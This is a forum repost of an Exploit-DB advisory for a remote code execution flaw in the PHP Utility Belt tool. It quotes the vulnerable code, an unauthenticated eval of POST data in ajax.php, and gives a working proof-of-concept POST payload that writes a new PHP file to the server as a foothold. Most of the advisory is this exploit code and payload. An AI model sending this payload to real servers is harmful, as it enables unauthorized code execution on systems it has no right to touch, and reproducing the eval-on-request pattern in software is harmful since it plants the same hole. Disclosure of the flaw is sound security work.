Jump to content
Massaro

PHP Utility Belt - Remote Code Execution

By Massaro, in Exploituri

Recommended Posts

Massaro Enthusiast

Massaro

Posted
Posted 

Exploit Title : PHP utility belt Remote Code Execution vulnerability
Author         : WICS
Date             : 8/12/2015
Software Link  : https://github.com/mboynes/php-utility-belt

Overview:


PHP utility belt is a set of tools for PHP developers. Install in a browser-accessible directory and have at it.
ajax.php is accessible without any authentication 

Vulnerable code (Line number 12 to 15)

if ( isset( $_POST['code'] ) ) {
  if ( false === eval( $_POST['code'] ) )
    echo 'PHP Error encountered, execution halted';
}


POC
Access URL 
http://127.0.0.1/php-utility-belt/ajax.php
in Post data type 
code=fwrite(fopen('info.php','w'),'<?php echo phpinfo();?>');

above code will generate info.php file which will display php info
Shell link will be 
http://127.0.0.1/php-utility-belt/info.php

Sursa: https://www.exploit-db.com/exploits/38901/.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...